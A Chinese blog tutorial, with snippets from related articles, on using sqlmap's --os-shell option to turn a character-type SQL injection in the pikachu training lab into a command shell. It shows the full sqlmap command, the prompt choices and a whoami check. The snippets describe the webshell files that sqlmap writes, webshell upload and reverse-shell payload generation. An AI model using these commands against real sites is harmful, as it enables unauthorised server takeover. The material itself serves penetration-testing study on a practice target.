sqlmap (--os-shell)的使用

最新推荐文章于 2025-09-15 20:58:21 发布
原创 最新推荐文章于 2025-09-15 20:58:21 发布 · 637 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何在phpstudy环境中通过sqlmap工具进行字符型SQL注入攻击,利用pikachu靶场实现路径公开和反弹shell,以及后续的权限查看过程。

sqlmap (–os-shell)的使用

实验前的环境准备:

  1. 搭建phpstudy环境及pikachu靶场
  2. 保证kali可以正常访问pikachu靶场

使用kali访问pikachu靶场

以字符型注入(get)为例,随便输入一些信息,点击“查询”

在这里插入图片描述

使用sqlmap注入

python sqlmap.py -u "http://192.168.1.139/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --os-shell

在这里插入图片描述

可以尝试的注入方式

在这里插入图片描述

选择语言 4

在这里插入图片描述

您是否希望sqlmap进一步尝试激发完整的路径公开 Y
输入pikachu靶场的绝对路径 2(自定义路径)在这里插入图片描述
选择路径的四个选项解析

在这里插入图片描述

成功反弹shell

在这里插入图片描述

查看权限
whoami

在这里插入图片描述

查看ip

图片转存中...(img-0whRP1Qq-1704088411824)]

芷若无尘
关注
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 5134
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmap--os-shell
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
sqlmap —— os-shell参数分析
未完成的歌~的博客
10-07 5025
文章目录前言:一、os-shell执行原理二、测试环境:三、过程演示1、测试权限2、攻击3、选择语言4、输入绝对路径5、建立 os-shell 并执行命令四、原理分析总结: 前言: 最近在看sqlmap,发现--os-shell这个命令很厉害,所以来研究一下。 一、os-shell执行原理 对于 Mysql 数据库来说,--os-shell的本质就是写入两个 php 文件,其中的一个可以让我们用来执行命令,而另外一个可以让我们可以上传文件。 说到写入文件,就要说一下上传文件的两个前提条件,首先我们要知道网站
sqlmap--os-shell
m0_71300782的博客
09-06 1241
一、首先对目标网站进行sqlmap扫描看看是否有sql漏洞。
sqlmap 如何 --os-shell 及反弹shell
weixin_63580357的博客
10-17 1878
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap mysql shell,sqlmap --os-shell执行原理(mysql篇)
weixin_34965737的博客
03-27 1598
sqlmap --os-shell执行原理对于mysql数据库来说,--os-shell的本质就是写入两个shell文件,其中的一个可以让我们用来执行命令,而另外一个,如果在网站访问的话,可以让我们可以上传文件。说到写入shell,就要说一下两个限制条件,首先,我们需要知道上传文件的两个限制条件,首先我们要知道网站的绝对路径(我们的shell写入到哪里),然后要有导入导出的权限。导入导出的权限在m...
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell
05-17 1277
从上面结果可以看出已经成功反弹 shell,不过这个 shell 操作起来不甚顺畅,可以在 Kali 生成反弹 shell 代码,借助上面生成的一个文件上传界面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。lhost=192.168.126.130:指定本地主机的IP地址,也就是反向连接的目标主机的IP地址。lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。-o shell.php:指定生成的payload文件的名称为shell.php。
sqlmap 如何 --os-shell 及反弹shell_sqlmapshell(3)
2401_84281594的博客
05-17 1289
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。lport=4444:指定本地主机的端口号,也就是反向连接的目标主机的监听端口号。
sqlmap os shell解析
weixin_34381666的博客
05-18 880
0x00 Background 最近遇到测试环境,最后利用sqlmap--os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令。 0x01 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 ...
os-shell:用 LEXYACC 编写的 Linux shell
06-13
#OS 外壳自述文件 用 LEX/YACC 编写的 Linux shell,由 Kyle Lin 和 Joachim Jones 编写。 我们的代码包含在 node.h、shell.l 和 shell.y 文件中。 #缺少功能 文件名补全 #特征 所有内置命令(setenv、printenv、unsetenv、cd、alias、unalias) 运行带有任意数量参数的命令(即'ls -l')。 如果命令名称中不存在“/”,则搜索路径。 环境变量扩展 别名支持和检查无限别名扩展 IO重定向:stdout、stderr、stdin都可以重定向 管道支持任意数量的管道 如果需要,“&”支持在后台完成程序 与“*”和“?”匹配的通配符人物 将错误打印到 stderr,并附上问题描述和违规行号 处理逃逸。 echo "my "string" 将输出我的 "string" 额外信用:还支持波
sqlmap (os-shell)
猎荒者
03-14 5910
Dancing with your ghost 环境准备 Kali(IP:10.10.16.128) win 7(IP:10.10.16.131)使用 phpstudy 搭建 sql 注入漏洞环境 NAT 网络连接 漏洞源码 查看源码可以得知这是一个数字型 SQL 注入 漏洞利用 直接在 Kali 中打开 Firefox 浏览器,访问。(这里在 phpstudy 的设置中,将 apach...
sqlmap os-shell解析
weixin_50464560的博客
07-13 985
Background 最近遇到测试环境,最后利用sqlmap的–os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 工具:sqlmap 靶机: 系统:windows7 环境:wamp搭建的apache、mysql和php 网页源码:phpmywind,此处修改了点源代码,方便进行
sqlmap --os-shell(写入木马获取getshell
NSQ0207的博客
09-06 2520
抓包,查看报错暴露出绝对路径。
--os-shell
xhscxj的博客
09-27 696
启动sqlmap查看当前注入点数据库权限是否为True sqlmap-u “http://172.26.240.90/sqli-labs-master/Less-1/?id=1” --is-dba 通过–sql-shell寻找数据库绝对路径 sql-shell> select @@datadir; 通过数据库的位置我们可以知道一个大致的路径,并自己猜测当前站点的路径 常见的找绝对路径方法: 网页报错信息 phpinfo、探针 数据库查询、暴力破解 参看:常用的绝对路径收集 查看php是否开启魔术
sqlmap--os-shell玩法
热门推荐
Bul1et的博客
12-25 1万+
首先找到注入点 证明存在注入漏洞 然后使用命令 sqlmap.py -r D:\1.txt -p username --random-agent --is-dba 看看是不是dba 这里不是dba所以不能使用--os-shell命令 如果是的话 例如 python sqlmap.py -u http://192.168.0.166/php/newsshow.php?cid=4 -...
sqlmap --os-shell原理
weixin_49793875的博客
12-28 641
这个权限被两个条件影响,一是当前数据库登录的用户(是否是dba),二是secure-file-privi;WAF:sqlmap的包原始特征太明显,useragent,危险函数直接写脸上了,请求体没有经过加密,普通的加密作用没有,复杂的加密工作环境没条件。可以发现,这个webshell运用的函数都是执行命令后有回显的函数,这样才能构成os-shell的交互界面;数据库配置方面:限制file权限,只有管理员用户具有,或安全配置secure-file-privi开关。只有值为off或空,才能被sqlmap利用;
SQLMap】获取 Shell
最新发布
2302_80252080的博客
09-15 744
摘要:SQLMap--os-shell功能通过SQL注入漏洞获取系统交互式shell,需满足数据库高权限、网站路径已知、GPC关闭及文件权限无限制四个条件。技术原理是利用数据库文件写入功能上传PHP脚本建立命令执行通道。防御措施包括最小权限原则、安全配置、输入验证和避免错误信息泄露。
SQLmap --os-shell 原理解析
m0_57836225的博客
10-11 1167
SQLmap 是用于 SQL 注入的工具,不仅能查询数据库数据,还可通过--os-shell指令获取目标服务器权限。
sqlmap --os-shell教程
03-16
### 关于 `sqlmap` 使用 `--os-shell` 参数的教程 #### 工具概述 `sqlmap` 是一款功能强大的自动化 SQL 注入渗透测试工具,能够检测并利用多种类型的 SQL 注入漏洞。除了基本的数据提取外,它还支持高级操作,比如通过 `--os-shell` 获取目标系统的命令执行权限。 --- #### `-d` 和 `--os-shell` 参数详解 1. **`-d` 参数的作用** `-d` 参数允许用户直接指定一个已经保存的目标配置文件路径或数据库连接字符串来启动扫描过程。这可以简化重复输入相同参数的过程[^1]。 2. **`--os-shell` 参数的功能** 当存在高危 SQL 注入漏洞时,`sqlmap` 能够尝试提升权限至操作系统层面,并提供交互式的 Shell 接口供攻击者使用。此接口可用于运行任意系统命令,前提是满足以下条件: - 数据库用户的权限足够高(通常是 root 或具有管理员权限)。 - 目标环境支持特定的操作模式(如堆栈调整、UDF 加载等)。[^3] --- #### 实际案例分析 以下是几个实际使用的场景及其对应的命令: 1. **基于请求文件的方式** 如果已有一个包含 HTTP 请求包的 `.txt` 文件,则可以通过如下方式调用 `sqlmap` 并启用 `--os-shell` 功能: ```bash python sqlmap.py -r /path/to/request.txt --dbms=mysql --os-shell ``` 这里 `-r` 表示读取请求文件的内容作为输入源;`--dbms=mysql` 明确指定了目标数据库类型为 MySQL[^2]。 2. **基于 URL 的方式** 若知道具体的注入点 URL 地址,可以直接将其传递给程序: ```bash sqlmap -u "http://example.com/vuln?id=1" --is-dba --os-shell ``` 上述例子中,`--is-dba` 用来验证当前登录账户是否具备 DBA 权限,这是成功开启 OS Shell 的前提之一。 3. **结合其他选项增强效果** 对某些复杂情况可能还需要额外设置一些辅助开关,例如绕过 WAF 防护机制或者优化性能表现等等。下面展示了一个综合运用多个参数的例子: ```bash sqlmap -u "http://target.site/page.php?param=value" \ --random-agent \ --level=5 \ --risk=3 \ --technique=BETUQ \ --os-shell ``` --- #### 技术原理剖析 当触发 `--os-shell` 后,`sqlmap` 内部会经历以下几个阶段完成最终目的: 1. 自动探测适合的方法实现远程代码执行; 2. 构建临时存储空间存放必要的脚本组件; 3. 利用这些资源加载自定义函数到内存当中去; 4. 提供给前端图形化界面让用户自由下达各种指令直至结束整个流程为止[^4]。 需要注意的是,在真实环境中应用此类技术务必获得合法授权以免触犯法律! --- ```python import os command = input("Enter your command: ") result = os.popen(command).read() print(result) ``` 上述 Python 小片段展示了如何简单地接收用户输入并在本地终端上回显结果,类似于 `sqlmap` 执行后的行为模拟版本。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值